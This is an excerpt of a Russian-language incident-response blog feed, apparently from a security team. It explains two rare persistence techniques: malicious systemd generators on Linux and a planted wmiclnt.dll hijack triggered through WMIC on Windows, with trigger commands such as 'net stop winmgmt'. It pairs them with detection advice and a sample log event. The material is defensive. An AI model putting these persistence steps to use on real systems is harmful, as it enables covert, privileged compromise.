<p>Systemd Generator — это исполняемый файл, который systemd запускает на этапе загрузки системы (или при выполнении daemon-reload) для динамического создания unit-файлов служб, целей и точек монтирования. Злоумышленники используют этот механизм для скрытого закрепления, поскольку генераторы выполняются с привилегиями root до запуска основных служб и редко проверяются администраторами.</p>
<p><strong>Ключевые директории:</strong></p>
<p>• <code>/etc/systemd/system-generators/*</code><br />
• <code>/usr/local/lib/systemd/system-generators/*</code><br />
• <code>/lib/systemd/system-generators/*</code> (или <code>/usr/lib/systemd/system-generators/</code>)</p>
<p>😐 <strong>Механизм закрепления:</strong></p>
<p>1. Злоумышленник помещает исполняемый файл в одну из ключевых директорий — скрипт или бинарный файл (обычно с маскирующим именем, например <code>systemd-cp-generator</code>).</p>
<p>2. При каждой загрузке системы или выполнении <code>systemctl daemon-reload</code> — <code>systemd</code> запускает все найденные генераторы.</p>
<p>3. Генератор может: создать свой сервис в <code>/run/systemd/system/</code> и включить его, перезаписать юниты существующих служб (особенно через <code>/run/systemd/generator.early/</code>, где приоритет выше, чем у <code>/etc/systemd/system/</code>), отключить критически важные средства защиты, выполнить полезную нагрузку напрямую.</p>
<p>😮 <strong>Рекомендации:</strong></p>
<p>Поскольку генераторы запускаются до систем мониторинга, основной метод — мониторинг файловой системы на предмет создания и изменения файлов в директориях генераторов.</p>
<p>1. Мониторинг файловой системы — в первую очередь отслеживайте создание и изменение файлов в перечисленных директориях. Используйте <code>auditd</code>, так как он работает на уровне ядра и может сработать даже при ранней загрузке.</p>
<p>2. Контроль целостности — периодически сверяйте хеш-суммы файлов в директориях генераторов с эталонными.</p>
<p>3. Ограничение прав — запретите обычным пользователям и непривилегированным процессам запись в эти директории.</p>
<p>4. Анализ генераторов — проверяйте нестандартные или недавно появившиеся генераторы, особенно если они не от легитимных пакетов (openvpn, <code>systemd-rc-local-generator</code> и т.п.).</p>
<p>На этом с этой серией постов — пока что все 😉</p>
<p><span class="hashtag">#ir</span> <span class="hashtag">#dfir</span> <span class="hashtag">#tips</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Редкие техники закрепления. Часть 3</title>
		<link>/rare-persistence-techniques-part-3/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Mon, 08 Jun 2026 15:25:04 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[tips]]></category>
		<guid isPermaLink="false">/%d1%80%d0%b5%d0%b4%d0%ba%d0%b8%d0%b5-%d1%82%d0%b5%d1%85%d0%bd%d0%b8%d0%ba%d0%b8-%d0%b7%d0%b0%d0%ba%d1%80%d0%b5%d0%bf%d0%bb%d0%b5%d0%bd%d0%b8%d1%8f-3/</guid>

					<description><![CDATA[Редкие техники закрепления. Часть 3 Читайте также про: Zabbix Agent, TimeProvider, COM Hijacking. 4️⃣ WMICLNT Эта техника закрепления основана на перехвате DLL, загружаемой легитимной службой Windows Management Instrumentation (WMI), и в MITRE…]]></description>
										<content:encoded><![CDATA[<p><strong>Редкие техники закрепления</strong>. Часть 3</p>
<p><em>Читайте также про: </em><a href="https://t.me/ptescalator/734" rel="noopener" target="_blank">Zabbix Agent</a><em>, </em><a href="https://t.me/ptescalator/734" rel="noopener" target="_blank">TimeProvider</a><em>, </em><a href="https://t.me/ptescalator/735" rel="noopener" target="_blank">COM Hijacking</a><em>.</em></p>
<p>4️⃣ <strong>WMICLNT</strong></p>
<p>Эта техника закрепления основана на перехвате DLL, загружаемой легитимной службой Windows Management Instrumentation (WMI), и в MITRE ATT&amp;CK классифицируется как <a href="https://mitre.ptsecurity.com/ru-RU/T1546.008" rel="noopener" target="_blank">T1546.008</a> (Event Triggered Execution: Accessibility Features) или как частный случай DLL Hijacking.</p>
<p>Злоумышленники используют особенность запуска консоли WMIC (<code>wmic.exe</code>), которая является стандартным инструментом системного администрирования. При запуске WMIC пытается загрузить библиотеку <code>wmiclnt.dll</code>, но эта библиотека может отсутствовать в стандартной поставке Windows.</p>
<p>Штатный <code>wmic.exe</code> работает и без нее — функциональность может быть ограничена, однако сам факт попытки загрузки позволяет атакующему разместить по пути поиска DLL свою вредоносную библиотеку.</p>
<p>Атакующий размещает вредоносную <code>wmiclnt.dll</code> в <code>C:\Windows\System32\wbem</code>. Для активации может использоваться любой удобный злоумышленнику триггер — как конкретное задание в планировщике, так и перезапуск системной службы. </p>
<p>В первом случае создается Scheduled Task, периодически дергающий легитимную утилиту (например, <code>wmic os get name</code>), что приводит к загрузке DLL и выполнению вредоносного кода в DllMain. </p>
<p>Во втором — применяется циклический перезапуск службы WMI командами <code>net stop winmgmt /y</code> и <code>net start winmgmt</code>, что также провоцирует обращение к подставной библиотеке и обеспечивает закрепление.</p>
<p>⬇️ Для успешной загрузки и скрытной работы вредоносная<code> wmiclnt.dll</code> должна удовлетворять следующим условиям:</p>
<p>• Функции экспорта: вредоносная DLL обязана реализовать и экспортировать все те же функции, которые пытается импортировать<code> wmic.exe</code> (<em>скриншот 3</em>), чтобы процесс не упал с ошибкой.</p>
<p>• Чаще всего вредоносная логика выполняется прямо в DllMain (функция <code>DLL_PROCESS_ATTACH</code>), так как это гарантирует выполнение кода сразу после загрузки библиотеки без необходимости вызова конкретных экспортируемых процедур.</p>
<p>• Проксирование: для максимальной маскировки вредоносная DLL может выступать в роли «прокси», пробрасывая вызовы на реальный системный API, чтобы wmic.exe отрабатывал штатно и не вызывал подозрений.</p>
<p>👀 <strong>Признаки компрометации:</strong></p>
<p>• Появление файла <code>wmiclnt.dll</code> в директории <code>C:\Windows\System32\wbem</code>\ (в чистой системе этот файл отсутствует, хотя на старых версиях мог существовать; в современных Windows 10/11 и Server 20xx файл находится в директории <code>C:\Windows\System32</code>\).</p>
<p>• Нестандартные дочерние процессы у wmic.exe (например, если из-под WMIC вдруг запускается <code>powershell.exe</code> или <code>rundll32.exe</code> с сетевым взаимодействием).</p>
<p>• Еще одним признаком компрометации может служить событие <strong>Event ID 11</strong> (Image Load), где поле <code>&quot;SignatureLevel&quot;: 1</code> указывает на <code>unsigned</code>/<code>untrusted</code> образ.</p>
<pre><code>{&quot;Event&quot;…&quot;EventID&quot;:11,&quot;Version&quot;:0,&quot;Level&quot;:0,&quot;Task&quot;:6,&quot;Opcode&quot;:0,&quot;Keywords&quot;:&quot;0x8000000000000000&quot;,&quot;TimeCreated&quot;:{&quot;#att  
ributes&quot;:{&quot;SystemTime&quot;:&quot;2026-02-27T10:26:15.414597Z&quot;}},…,&quot;Channel&quot;:&quot;Microsoft-Windows-SecurityMitigations/KernelMode&quot;,&quot;Computer&quot;:“REDACTED&quot;,&quot;Security&quot;:{&quot;#attributes&quot;:{&quot;UserID&quot;:&quot;S-1-5-  
18&quot;}}},&quot;EventData&quot;:{&quot;ProcessPathLength&quot;:52,&quot;ProcessPath&quot;:&quot;\\Device\\HarddiskVolume4\\Windows\\System32\\svchost.exe  
&quot;,&quot;ProcessCommandLineLength&quot;:56,&quot;ProcessCommandLine&quot;:&quot;C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s  
Winmgmt&quot;,&quot;ProcessId&quot;:37383,&quot;ProcessCreateTime&quot;:&quot;2026-02-  
27T10:26:15.254827Z&quot;,&quot;ProcessStartKey&quot;:19140298416383003,&quot;ProcessSignatureLevel&quot;:0,&quot;ProcessSectionSignatureLevel&quot;:0,  
&quot;ProcessProtection&quot;:0,&quot;TargetThreadId&quot;:29700,&quot;TargetThreadCreateTime&quot;:&quot;2026-02-  
25T08:24:13.276875Z&quot;,&quot;RequiredSignatureLevel&quot;:8,&quot;SignatureLevel&quot;:1,&quot;ImageNameLength&quot;:34,&quot;ImageName&quot;:&quot;\\Windows\  
\System32\\wbem\\wmiclnt.dll&quot;}}}</code></pre>
<p>Продолжение будет в следующем посте 🔽</p>
<p><span class="hashtag">#ir</span> <span class="hashtag">#dfir</span> <span class="hashtag">#tips</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
